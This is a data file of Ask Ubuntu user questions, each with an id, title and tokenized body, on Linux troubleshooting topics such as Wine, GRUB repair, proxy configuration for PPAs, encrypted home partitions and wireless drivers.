53079	hibernating on ubuntu 10.04	recently i tried to hibernate my ubuntu 10.04 and upon turning on my computer it took a while and i saw a lot small square in left upper part of my monitor and 2 white somewhere in the middle . is it normal ? edit did it again and it 's same also when i click hibernate and before it turns off i got 3 errors something blablablabla failed to resubmit ( do n't remember exactly ) . also if it matters i have windows 7 too and they are both installed on same disk
53080	how to have more than one wine version on same machine without corrupt anything ?	i often use wine both to run application that wo n't work otherwise and for simply testing as i like the project . indeed when i `` discover '' something that work i add it to the appdb . so i would to use several version of wine without corrupting the main one ( .wine [ development version ] ) . how can i compile the wanted version ( downloaded from sources ) avoiding to overwrite the main ? where is the best location to install these version ? ( hoping will work ) which parameters i should use not to mess anything ? how can i use them then ? i 've to go in the dir and simply run wine ? i hope wo n't be compiling errors , but i think seeking the readme , i 'll do : )
53081	open mailto : links in unity with non-default browser webapp ?	i use firefox as my default browser . email is a chromium webapp pinned to the launcher , with a google apps account so it 's basically gmail . most solutions involve the 'desktop-webmail ' application that does n't work in unity , or setting the default browser to handle the mailto : links . can i set firefox , chromium and maybe even nautilus to use my chromium webapp ?
53082	are resized or moved partitions in any way worse than unmanipulated partitions ?	in comparing a resized or moved partition to unmanipulated partitions ( as in created and used partitions that have never been resized or moved ) , are the unmanipulated in any way worse given that both are properly aligned ? i 'm not asking which is safest way to handle because i know that resizing or moving partitions might harm them so that data is lost . what i 'm asking is if there 's any relevant difference of resized or moved partition and unmanipulated partitions such as in performance or security given that both are properly aligned . that is , is resizing or moving partition in any way advised against if it 's excluded that you might lose data as you do it and that you might mess up alignment ?
53084	how do i change which mirror i get updates and software from ?	how do i select which server ubuntu will get it 's software and updates from ? i know how to find the list of mirrors on the web , but not how to use them .
53102	how to open magnet links from firefox with deluge	how can i open magnet links with firefox ? i tried setting following values in about : config , network.protocol-handler.app.magnet - > /usr/bin/deluge network.protocol-handler.expose.magnet - > true network.protocol-handler.external.magnet - > true but firefox keeps on complaining about firefox does n't know how to open this address , because the protocol ( magnet ) is n't associated with any program . i am using repository version of firefox ( 5 ) and deluge ( 1.3.1 - gui+daemon mode ) on ubuntu 11.04 edit : i was told to set network.protocol-handler.expose.magnet to false and firefox would ask which application to use , but i see no box asking me something appearing .
53105	how to speed up evolution	i have a moderately big inbox file ( around 2.3gb ) and evolution takes a lot to start ( it takes over 2.5 mins until i can perform any action -read or compose mail , for instance- ) . during that time , the shole system becomes unresponsive , with high hd activity . it becomes unresponsive when retrieving mail , too : it stalls for about 30 secs . closing evolution can take yet another 1.5 minutes , also . is there any way i can speed things up ? last edit : as i have checked that reducing my inbox file size ( by means of moving old mail to an 'archived mail ' folder ) does the trick of speeding everything up , while keeping a copy of every mail at hand , my ultimate question is : is there any `` auto-archive '' feature or plug-in or script or anything for evolution ? i could do it `` by hand '' using saved searches and such , but it would be nice to have it automatically done ( as it is in outlook , for instance ) previous edit : answering comments : evolution retrieves pop mail from gmail and a personal postfix/courier mailserver i could change to any other mail client provided that a ) migration is easy enough b ) speed problems are likely to vanish with the new client and c ) i can sync contacts and calendar with gmail i 'm not experiencing high hdd activity problems with other apps , and swap is not ( or at least should not be ) a problem , since it 's usually at 0 % ( i 'll keep an eye on it , anyway ) other considerations : i used to work with outlook and it managed several 2 gb files ( one was actually the inbox , and three were `` archive.pst '' files , to which i never added more mails , except when outlook auto-archived old ones ) . i even would like to add this pst files to evolution , so that i can be able to search old mails , but a ) i do n't know how and b ) i 'm scared ... if evolution ca n't handle properly a 2.3 gb file , adding load would be a bad idea , i suppose . i guess things would speed up if i could `` move '' some old mail from my inbox file to another one , but it should be readable and searchable . anyway , i do n't know if this can be done with evolution , and , as stated , is just a guess .
53106	thunderbird-trunk not installable in 10.04 due to unmet dependencies	when i try to install thunderbird-trunk from the ubuntu mozilla daily ppa , i get : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : thunderbird-trunk : depends : libindicate5 but it is not installable depends : libdbusmenu-gtk4 but it is not installable or libdbusmenu-gtk3 but it is not installable e : broken packages this is very strange as i installed it last week and it worked fine .
53108	how to force ubuntu one contacts sync with evolution ?	i am using evolution in ubuntu 11.04 , and i have encountered a problem with trying to synchronize contacts with ubuntu one when they are created through the web interface . the contacts i have created this way will not sync into my evolution contacts . i have searched for people having the same issue but could n't find anything . so my question is : how can i force ubuntu one to update all my contacts in evolution to match those in the web interface ?
53112	empathy vs sametime	is it possible to use sametime protocol in the empathy ? i tired to select it from protocol list but there is nothing to configure ( unable to define server , username password )
53119	how do i kill a locked ssh session ?	from time to time , ssh sessions to my servers just freeze up and then neither ctrl+c nor ctrl+\ do anything . how do i quit the session without just closing the terminal it 's in ? clarification : the session is locked as in , no keys are transmitted to the server . i 'd like to shut it down gracefully , such that the user is n't logged in anymore . i know i can kill the ssh client , but that will , in time , make the `` 2 users '' info message i get from uptime meaningless . i 'd like to know how many users are really logged in .
53125	how to backup sites on my vps	hi i have a new vps set up and i am moving my sites to it . what is the easiest way to set up scheduled backups of all my sites to the same vps or to another server ? thanks .
53126	how do i highlight an item in nautilus ?	when we download something in firefox and right-click on item [ firefox- > download ] and select open with folder it just open containing folder [ nautilus ] but does not highlight the downloaded item . in windows and mac open folder highlight the downloaded item . it is very difficult to find recently downloaded file if there are so many existing file or folder . is there is any way to do this in nautilus ?
53129	how can i get update manager to check & notify for daily updates	in software sources , i have update manager set to check for updates daily . i also selected the setting to notify but not to download or install updates . considering my settings , why do i not receive daily notifications when updates are available ? for example , google chrome ppa released a security update tuesday . yet as i write this my update manager has not alerted me that there is an update available for my google chrome ppa . from past experience i know that if i manually run update manager the chrome ppa update will be available . how do i get update manager to check and notify for updates daily ? i do not want to have to manually run update manager on a daily basis to see if there are updates available . this happens on both lucid and natty . in startup applications - update notifier is enabled .
53130	how to sync contacts from ubuntu one to evolution	i have all my contacts saved in ubuntu one via the web . i would like to sync all those contacts with evolution . i can find all kinds of info on syncing from evolution to ubuntu one , but i want to do it the other way around . i am using ubuntu 11 .
53133	install a `` base system '' only and add only wanted packages after	i used to have ubuntu , but i stopped using since in each release almost everything changes , default applications are changed and such . i 'm with a mac i 'm planning to install along with mac os x. i would like to install just a base system , but having the ubuntu package manager and the repositories , even without gnome , and install using the command line , but with the mac drivers ( for example , multi-touch and webcam ) . anyone knows a guide for that ?
53136	realtek 8190 wireless does n't work	i have a realtek rtl 8190 ( 802.11n ) wireless controller . > lspci -v | grep network 04:01.0 network controller : realtek semiconductor co. , ltd. device 8190 i first installed the driver rtl8192se_linux_2.6.0010.1012.2009_64bit.tar.gz , but apparently that does not work for the 8190 . on searching deeper , i found that i should use ndiswrapper with the windows drivers , following these instructions . i downloaded the 64-bit drivers , installed them with ndiswrapper , and verified that the installation worked : $ ndiswrapper -l net819xp : driver installed device ( 10ec:8190 ) present but still the driver does not work : $ iwconfig lo no wireless extensions . eth0 no wireless extensions . i read that i needed to execute sudo modprobe ndiswrapper to start it , but that did n't change a thing . does anybody have any insights ? is the rtl8192se driver maybe conflicting ? how do i remove that one ?
53140	access and control of ups	how is ups monitoring started ? i have network ups tools ( nut ) core system loaded on ubuntu 11.04 ( client ) , but can find no application to run from the system menus . the software center description says the following programs in nut are run from a terminal : upsc , upscmd , upsd , upsdrvctl , upslog , upsmon , upsrw , upssched . i want to monitor and configure a single ups via a gui interface . i checked device manager and the ups is visible ( via usb port ) . i also checked sysv-rc-conf to confirm that nut is running on levels 2-5 . is there another interface i need to install ? what 's the next step ?
53141	programs shut down immediately after opening	i am new to ubuntu . i am having a problem where various programs , including , but not limited to ubuntu software center , update manager , computer janitor , synaptic package manager , and others shut down immediately after opening . the screen comes up , but before i am able to click on anything , within 1 second after opening , they simply disappear . any ideas ? thanks in advance . weston
53144	why wo n't age of empires 3 work ?	i copied my 3 cds into one directory and ran the installer from there with wine . it installed perfectly fine . i was even able to watch the intro , navigate all the menus and start a game . however , about 1-30 seconds after starting the game , i get the infamous `` age of empires 3 has encountered a problem and needs to close '' pop-up with the `` send/do n't send '' buttons . i was unable to determine any error from that . i ran it from a terminal and i believe the important part of the output is : err : eventlog : reporteventw l '' age3.exe '' err : eventlog : reporteventw l '' 4.105.919.3236 '' err : eventlog : reporteventw l '' deformerdll.dll '' err : eventlog : reporteventw l '' 0.0.0.0 '' err : eventlog : reporteventw l '' 00001363 '' can someone tell me what this means and what i need to do to get aoe3 working ? i looked on the cd for deformerdll.dll and also checked winetricks for it . i did n't find it . note : i have already tried the methods suggested at winehq and it still does n't work . for anyone interested in the whole several page output of terminal , here it is .
53146	how do i get add-apt-repository to work through a proxy ?	i 'm trying to follow the `` installing cross toolchain on ubuntu 10.04 ( lucid ) and 10.10 ( maverick ) hosts '' instructions on wiki.linaro.org ( on my ubuntu 10.04 vm ) . the first step is : sudo add-apt-repository ppa : linaro-maintainers/toolchain but when i run that i get : error reading https : //launchpad.net/api/1.0/~linaro-maintainers/+archive/toolchain : < urlopen error [ errno 110 ] connection timed out > i 'm guessing the problem is with my configuration for my employer 's proxy server , particularly for https . when i opened https : //launchpad.net/api/1.0/~linaro-maintainers/+archive/toolchain in firefox , i got `` the connection has timed out '' . i then went into firefox preferences - > advanced - > network - > settings ... and set http proxy to `` gateway '' and port to 8080 , and checked `` use this proxy server for all protocols '' . then the page loaded . this supports my theory . i 've tried setting the http_proxy and https_proxy environment variables ( both lower and upper case ) : $ set | grep -i proxy https_proxy=https : //gateway:8080 http_proxy=http : //gateway:8080 http_proxy=http : //gateway:8080 https_proxy=https : //gateway:8080 i also tried changing them to : $ set | grep -i proxy https_proxy=gateway:8080 http_proxy=gateway:8080 http_proxy=gateway:8080 https_proxy=gateway:8080 and i tried adding this second line to /etc/apt/apt.conf : acquire : :http : :proxy `` http : //gateway:8080/ '' ; acquire : :https : :proxy `` https : //gateway:8080/ '' ; but i continue to get the same error . how do i troubleshoot this ? update : i followed the instructions in the accepted answer to `` problem adding repositories and connecting from terminal behind a proxy '' and got further : $ sudo add-apt-repository ppa : linaro-maintainers/toolchain executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 1dd749b890a6f66d050d985cf1fcbaca7be1f97b gpg : requesting key 7be1f97b from hkp server keyserver.ubuntu.com gpgkeys : http fetch error 7 : could n't connect to host gpg : no valid openpgp data found . gpg : total number processed : 0 i wonder if the `` http fetch error '' means i also need to add `` defaults env_keep = http_proxy '' to /etc/sudoers ... update # 2 : i added : defaults env_keep= '' http_proxy '' defaults env_keep= '' https_proxy '' ... as in comment 18 for bug 516032 , but i still get the same `` gpgkeys : http fetch error 7 : could n't connect to host '' error . and this is curious : $ sudo env | grep proxy https_proxy=https : //gateway:8080 ... because http_proxy is n't there . any advice is appreciated . update # 3 : since the host of my vm is a laptop , i took it home and tried there ( with no proxies ) : $ sudo add-apt-repository ppa : linaro-maintainers/toolchain executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /etc/apt/secring.gpg -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv 1dd749b890a6f66d050d985cf1fcbaca7be1f97b gpg : requesting key 7be1f97b from hkp server keyserver.ubuntu.com gpg : key 7be1f97b : public key `` launchpad linaro overlay ppa '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) it worked . so problem is related to proxy configuration . but i suppose i have a workaround .
53148	wireless connection works but the internet is too slow to use in ubuntu 11.04	the internet is so slow as to be unusable . and i 'm not being picky . even after minutes i ca n't get my google home page to load . i tried installing a package through apt-get and was getting rates between 0 and a few hundred bytes/s . that 's bytes , not kilobytes ! mostly 0 however ( no exaggeration , it spends large amounts of time stalled ) . and i would go to a speed test web site of some kind but i ca n't since nothing will load . briefly put , the laptop i am using was connected to two wireless networks while using ubuntu 11.04 without any issues before this . it was also connected to a wired network without any issues . it dual boats windows 7 which has never had any issues , not even with the current wireless network . just to be clear , on the current wi-fi network , windows 7 encounters no issues ( speedtest.net puts the network speed at 1mb/s ) but my network connection in ubuntu 11.04 is so slow as to literally be unusable . i am unfamiliar with the router except for the fact that it boasts a rogers logo ( that 's a large isp/cable provider in canada for those not familiar with the land of igloos and polar bears ) . i am far from the router and some desktop widget i use tells me the signal strength is at 58 % ( it seems fairly reliable and this would appear to match up with the filled bars in the network icon ) . i should also mention i 'm just renting a room in this house so i 'm not the network administrator and while i can access the 192.168.0.1 router page , the password was n't set to 'password ' so it 's not much use to me . here are a bunch of commands i ran which do n't tell me a whole lot but i thought might be more instructive to the wise around here : lspci ( just showing my network card ) : 05:00.0 network controller : atheros communications inc. ar928x wireless network adapter ( pci-express ) ( rev 01 ) this one is self explanatory . ping www.googele.com ( 216.65.41.185 ) 56 ( 84 ) bytes of data . 64 bytes from nnw.net ( 216.65.41.185 ) : icmp_req=1 ttl=51 time=267 ms 64 bytes from nnw.net ( 216.65.41.185 ) : icmp_req=2 ttl=51 time=190 ms 64 bytes from nnw.net ( 216.65.41.185 ) : icmp_req=3 ttl=51 time=212 ms 64 bytes from nnw.net ( 216.65.41.185 ) : icmp_req=4 ttl=51 time=207 ms 64 bytes from nnw.net ( 216.65.41.185 ) : icmp_req=5 ttl=51 time=220 ms -- - www.googele.com ping statistics -- - 5 packets transmitted , 5 received , 0 % packet loss , time 4003ms rtt min/avg/max/mdev = 190.079/219.699/267.963/26.121 ms ifconfig eth0 link encap : ethernet hwaddr 20:6a:8a:02:20 : da up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:42 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:960 ( 960.0 b ) tx bytes:960 ( 960.0 b ) wlan0 link encap : ethernet hwaddr 20:7c:8f:05 : c6 : bf inet addr:192.168.0.16 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :227c:8fff : fe05 : c6bf/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:982 errors:0 dropped:0 overruns:0 frame:0 tx packets:658 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:497250 ( 497.2 kb ) tx bytes:95076 ( 95.0 kb ) thank you
53149	strange behavior when using command line `man`	when i run the command line : man fork there is a highlight line at the bottom says : manual page fork ( 2 ) line 52/99 ( end ) but when i navigate to line 53 and up to 99 , they are just blank lines . why does linux system save this extra lines ? what 's its main purpose ? note i already asked this question here http : //unix.stackexchange.com/questions/16698/why-does-man-page-have-many-extra-lines . however , i believe it relates particularly to ubuntu . thank you ,
53150	software update center gone grey	my suc is grey , i see nothing but a grey screen . lsb_release -rd description : ubuntu 11.04 release : 11.04 sudo apt-cache policy software-center software-center : installed : 4.0.4 candidate : 4.0.4 version table : *** 4.0.4 0 500 http : //br.archive.ubuntu.com/ubuntu/ natty-updates/main i386 packages 100 /var/lib/dpkg/status 4.0 0 500 http : //br.archive.ubuntu.com/ubuntu/ natty/main i386 packages i have tried this : sudo apt-get -y -- reinstall install software-center sudo apt-get clean
53151	i removed my video card , and my login screen vanished , too	i removed my nvidia graphics card , plugged my monitor into my motherboard 's dvi port . i then turned the computer on , saw the bios settings , saw the distinctive plain-purple screen , then ... a black screen . nothing . ctrl+alt+del restarts the computer , and the same process happens . if i hit the power button , some shutdown text appears on the screen very quickly ( i believe it includes the words `` ubuntu '' ) , and then the computer turns off . how can i make the login screen show up ? i no longer have the graphics card . i 'm using ubuntu 11.04 .
53152	clear `` most frequently used '' in `` applications '' ?	in the new ubuntu , can you clear `` most frequently used '' in `` applications '' ?
53154	gtk-update-icon-cache problem while installing elementary theme	i am trying to install elementry unity theme on natty . i used following commands to install the theme . sudo add-apt-repository ppa : elementaryart/elementarydesktop sudo apt-get update sudo apt-get install elementary-icon-theme in the last step , i am getting following error . unpacking elementary-icon-theme ( from ... /elementary-icon-theme_2.7.1-0ubuntu1~natty1_all.deb ) ... setting up elementary-icon-theme ( 2.7.1-0ubuntu1~natty1 ) ... gtk-update-icon-cache : the generated cache was invalid . warning : icon cache generation failed for /usr/share/icons/elementary i tried to force the cache using following command , still it is failing . desktop : ~/full_circle $ sudo gtk-update-icon-cache -f /usr/share/icons/elementary gtk-update-icon-cache : the generated cache was invalid could you please tell me how to solve this problem .
53155	enabling `` sync all photos '' on android app	i think this issue will be pretty easy to solve . i just re-discovered ubuntu one files on android and installed it . on the first run , i selected `` sync all photos from now on '' as opposed to syncing all the photos on the sdcard . now i want to sync all the photos ( on wifi ) but ca n't seem to get the option back . reinstalled several times and cleared `` settings '' through the stock android app manager .
53159	clean up chroot	is there way to quickly clean up or revert your chroot to its previous new state , without reinstalling or re setting it up , so i could start fresh again ?
53161	reduce window border size ?	one of the most annoying things about ubuntu is probably the ~3-5-pixel border distance between the buttons on the title bar and the top and right sides of the window . is there any way to reduce that to zero ?
53166	installed server but track the desktop kernel	is it possible to have a system originally installed with the ubuntu 10.04 server edition both use and track updates of the desktop kernel ( i.e . linux-image-generic instead of linux-image-server ) ? i assumed the difference between the packages tracked by the desktop and server editions would be reflected in /etc/apt/sources.list , but the two look similar to me . so , how does a system know which kernel to track ?
53169	ubuntu wo n't play dvds even after installing codecs	i installed libdvdcss2 , and it worked for a while , but now whenever i put in a dvd as of late , and try to play it , it 'll tell me the dvd is encrypted and that it can not be played ... do note that all codecs are installed . what do i do to fix this problem ?
53175	changing shell to zsh broke my terminal	i ran sudo chsh -s /bin/zsh to change my default shell to zsh . i then restarted my computer . when i turned it back on i get just $ as the prompt , so it does n't look like i even get bash any more . echo $ shell is `` /bin/sh '' next steps to either return my shell to bash or fix zsh ? this is for ubuntu 11.04 .
53176	can i directly dial phone numbers from evolution 's address book ?	is there a way to directly dial phone numbers from evolution 's address book ? i have an isdn phone on my desk connected via usb . i 've written a shell script that uses a phone number on the command line and then dials this number . the missing step is the integration into evolution 's address book . previously i 've used thunderbird where there is a click-to-dial extension . the address book shows the phone numbers as links and a script is executed when you click on one . does something like this exist for evolution or something like it ?
53177	bash script to set environment variables not working	i 've written the following script to set some environment variables when needed . # ! /bin/sh export base=/home/develop/trees echo $ base export path= $ path : $ base echo $ path below the command and the results i can see on my terminal : the script runs , but the variables are not set at the end . ~ $ : ./script.sh /home/develop/trees /bin : ... ... : /home/develop/trees ~ $ : echo $ base ~ $ : what 's wrong ? thanks in advance . mirko
53181	how to restore grub after installing windows ?	hi installed w7 after ubuntu 11.04 , and it broke up my boot options , i followed this tutorial to restore boot loader : recovering ubuntu after installing windows . but when i run : sudo grub-install -- boot-directory=/media/5292fba2-f517-466d-a120-b8a61a97ca8a/boot /dev/sda2 i get this errors : /usr/sbin/grub-setup : warn : attempting to install grub to a partitionless disk or to a partition . this is a bad idea.. /usr/sbin/grub-setup : warn : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/grub-setup : error : will not proceed with blocklists . can somebody help me with this ? thanks in advance .
53182	how to create an audio clip from a video file using command line ?	i would like to create an audio clip from a video file using the command line , since this is in a terminal text-only ubuntu 11.04 server system . i would like to select the starting and finishing time for the clip from the video file , something like : create_clip video.file -from 00:10:00 -to 01:20:10 -o clip.file any suggestions ?
53187	computer stops randomly . continues after user activity	background : i was trying to do a long smb to smb network transfer on a computer running xubuntu , but i 've encountered a very weird problem : my computer loses its network connection after random amount ( in range of 10-40min ) of inactivity , and any user activity ( even moving the mouse ) brings it instantly back up . the computer is connected via ethernet cable , not wlan . when the connection drops , it stops answering and also disappears from the client list of the nat router after a while . i tried running a script that automaticly mimicks user behaviour with xdotool , but that does not seem to work . i also noticed that it 's not just network activity that stops - the script outputs an increasing number every minute , and when the computer drops off network i noticed that the number does n't increase ! the script and network activity continues as if nothing had happened when i move the mouse , press shift or anything . i found are no bios options relevant to this , and there 's no such features in xubuntu power management i know of . the computer is a compaq presario 6540fi . question : any ideas what might be causing my computer to behave like this ? i did solve the data transfer issue by , ehm , duct-taping my mouse to a rotating tabletop fan to mimic user activity . ( yes , really . ) regardless , i 'm still quite interested in what actually causes this weird issue . ( cross-posted to super user since this might have nothing to do with the os ... )
53190	how to retrieve files from a windows partition from ubuntu desktop	i 'm new to ubuntu/linux and i 'm thus not very used to working on it . i used to have a windows 7 and currently i dual-boot . i 'd like to change to only ubuntu . but i do n't want to lose any information . i have a lot of songs , movies , pics , etc . saved on my computer but i have no idea how to get it from my ubuntu desktop . and will all this information be lost if i change to ubuntu ? ( i have a lot of stuff so using a hard disk , usb is not an option . )
53199	custom apache 404 page	i want to customise the 404 page of my apache webserver on ubuntu to something other than the general : not found the requested url /***** was not found on this server . ______________________________________________________ apache/*.* . ** ( ubuntu ) server at **** port 80 how can this be accomplished ?
53202	how do you create a `` new document '' keyboard shortcut ?	while i have a nautilus window open i can do ctrl+shift+n to create a new folder in the current directory . however there is no default keyboard shortcut for creating a new document . how would i create one ?
53204	sort albums by date in banshee	banshee has an option - sort albums by release date , not by name , but turning it on do nothing . all tags are filled correctly . is at a bug or i miss something ?
53207	how can i correctly install multiple non-package distribute/virtualenv/pip ecosystems on ubuntu ?	i am developing python applications in ubuntu . i want to setup a distribute/virtualenv/pip ecosystem to manage my python packages independently of any system python packages ( which i manage in synaptic , or rather i let the system manage them for me ) . i could just install the python-setuptools , python-virtualenv and python-pip system packages and be on my merry way , but i also want to be able to get latest/specific versions of distribute , virtualenv and pip . there are no ppas for these , so i 'll have to install them manually . a final complication , is that i want to be able to do this for multiple versions of python . that is , set up one ecosystem for python2.6 , another for python , another for python3 , or on a 64-bit system another for chrooted 32-bit python . i 'm guessing that the process would be something like : using python x install my own copy of distribute to a location in my home folder using indie distribute , easy_install pip using indie pip , install virtualenv using indie virtualenv , create virtual environment activate virtual environment , install packages repeat for python y , z and q what installation/configuration options am i looking for ?
53210	how to add a script to command list	i am using sage a math library in python . after downloading its package , i usually have to go to the directory where i extracted it and then run the the script using sudo ./sage from terminal . how can i add sage to the list of installed applications , that i will be able to run the script by typing sage command from any directory in terminal ?
53211	why does sysinfo list my cpu as having 1,6ghz when i have an i5-2300 cpu @ 2.80ghz ?	i would like to know whether there could be a driver i 'm missing , since sysinfo ca n't see the correct value for my cpu frequency
53212	stopping xfce4 from starting up on boot on ubuntu server 10.04	i installed xfce4 on my ubuntu server 10.04 based server to be able to use a gui remotely through vnc . i installed it using the command sudo apt-get install xubuntu-desktop . however , after that , the xfce login screen appears on the server after a reboot . how can i prevent that from happening ? how can i revert to having the server simple boot into command line ?
53218	compiz clampdown ?	i 'm using gnome . i 've discovered suddenly that i ca n't resize most windows . i hover over an edge or the lower right corner and the drag bar appears , but i 'm not able to engage it . i tried turning off a lot of things i was n't using in compiz ( which turned on ages ago , so why that would work i ca n't say ) and now i ca n't even move windows around . the cursor behaves the way i 'd expect but clicking and holding does n't allow any movement . it is obviously a little exasperating , and i 'm wondering how to go about troubleshooting this . update : compiz is definitely the issue . if i do metacity -- replace i get a functional , no frills , x window manager . if i try to restore compiz ( compiz -- replace ) the problems come right back with it .
53220	open with wine/photoshop not working properly	i am running photoshop cs2 under ubuntu 10.10 with wine 1.3.23 . i would like to be able to associate various file types with photoshop . i 'd previously used this script : # ! /bin/sh quickparlocation= '' c : \\program files\\adobe\\adobe photoshop cs2\\photoshop.exe '' param=`winepath -w `` $ * '' ` wine `` $ quickparlocation '' `` $ param '' exit 0 if i make this script be the customer command that 's tied to `` open with , '' photoshop launches , but does n't appear to be properly passing the file name , so that file does n't open . i 'd had this working previously under earlier versions of ubuntu and wine . p.s . please no commentary on using gimp or other photoshop alternatives
53221	how do i investigate/confirm the identity of a ppa maintainer ( e.g. , chromium team ) ?	the chromium stable ppa ( as found here : ppa : chromium-daily/stable ) is maintained by chromium team ( https : //launchpad.net/~chromium-team ) . i assume this is `` google 's '' chromium developers ? if so , i would assume this ppa is very safe and trustworthy . but is there a specific procedure or method of investigation that i should/can do to confirm the identity of the maintainer ? as i understand it ( or at least have read ) , anyone can create a `` chromium team '' ppa . for safety and security , i 'd like to learn how to confirm the identity of ppa maintainers , especially `` big name '' maintainers like google or mozilla .
53222	is there a document scanning and archiving software ?	i 'm looking for some kind of ( free or open source ) document management application which should allow me to store paper documents in my personal computer allowing me to add fields of information with data entry to be able to get the digital copy back . e.g . if the document is a fine i can find it if i remember the date or the fact that is a fine or another custom field i could add to search . ocr full text search would be a great plus but not mandatory . thanks to everybody !
53223	use wget to download a file from my ubuntu one account/ online storage	is there any way to use wget to download a file from my ubuntu one account/online storage ? say i try wget http : //ubuntuone.com/p/14bm/ it should download the file called `` wget-u1-test-doc.txt '' but all i get is a file index.html . for now i 'm using a dropbox account to do this job instead of ubuntu one . i 'm playing around with some post install scripts { i 'm trying to teach myself some things } on ubuntu in virtualbox oneiric and natty so i may install ubuntu then after a while do a clean install and start from fresh . the scripts mainly just download and install customized .desktop files for the unity launcher and put them in the right places . this is so i do n't have to keep doing it manually every time . and i find it a fun way to learn not only scripting but ubuntu as well .
53225	files lens and xdg-open only open nautilus but not the correct applicatiion	since some days my files lens opens only nautilus but not the correct application which is associated with the file extension . for example , if i choose a pdf file , nautilus is openend , pointing to the directory there the file is ( and the file is selected ) but adobe reader is not opened . then i do the same in the terminal with xdg-open sample.pdf only nautilus is opened too . xdg-mime shows me this info : $ xdg-mime query default application/pdf acroread.desktop the /usr/share/applications/acroread.desktop file : [ desktop entry ] name=adobe reader 9 mimetype=application/pdf ; application/vnd.fdf ; application/vnd.adobe.pdx ; application/vnd.adobe.xdp+xml ; application/vnd.adobe.xfdf ; exec=acroread type=application genericname=pdf viewer terminal=false icon=adobereader9 caption=pdf viewer x-kde-startupnotify=false categories=application ; office ; viewer ; x-red-hat-base ; initialpreference=9 the same with other file types like images , music files and office documents . then i doubleclick the file in nautilus everything is ok and the correct applications are opened . i assume this behaviour has something to do with thunar which i 've installed some days ago but deinstalled after these problems . any suggestions ?
53238	how does one go about installing flash 11 ( 64bit ) ?	how does someone install the new beta version of flash 11 ?
53242	check if partition is encrypted	how do i check if a partition is encrypted ? in particular i would like to know how i check if /home and swap is encrypted .
53246	repartition encrypted partition	when i installed natty ( 11.04 ) i chose to encrypt /home and i chose to mount it on a separate partition . i would like to repartition /home without losing data and by having the same sort of encryption after the repartitioning is done . i guess that this would mean to do the following : temporarily storing the data i want to keep somewhere else . repartitioning . putting the data pack on the partition . activation of encryption . or maybe i can clone the data on the partition so that i can skip the last point ? how should i proceed ? i would appreciate detailed instructions for every step in the process . here 's the output from mount : /dev/sdc1 on / type ext4 ( rw , noatime , errors=remount-ro , discard , commit=0 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) /dev/sdb1 on /var type ext4 ( rw , commit=0 ) /dev/sda2 on /home type ext4 ( rw , commit=0 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) /home/username/.private on /home/username type ecryptfs ( ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=9095a85defbbd74d , ecryptfs_fnek_sig=ac460d25b6a798e1 ) gvfs-fuse-daemon on /media/ssd-store/home/username/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=username )
53257	why do i get a purple screen whilst installing ubuntu server 11.04	i 'm trying to install ubuntu server 11.04 on an 64-bit amd machine . the install goes fine until after `` loading additional components '' , then i get a blank purple screen with a responsive cursor at the bottom . i 've looked everywhere and ca n't find anything ( all the documentation seems to be on the desktop version ) . i have a wireless card installed if that makes a difference , do n't why it would . this happens regardless of whether nomodeset is set or not . here 's what it looks like ( as described ) : specs : cpu - 64-bit amd sempron 140 @ 2.7ghz ram - 1gb ddr3 1333 hdd - wd 500gb 7200rpm sata 3.0gb/s mobo - foxconn m61pmp-k wireless card - rosewill rnx-g300lx
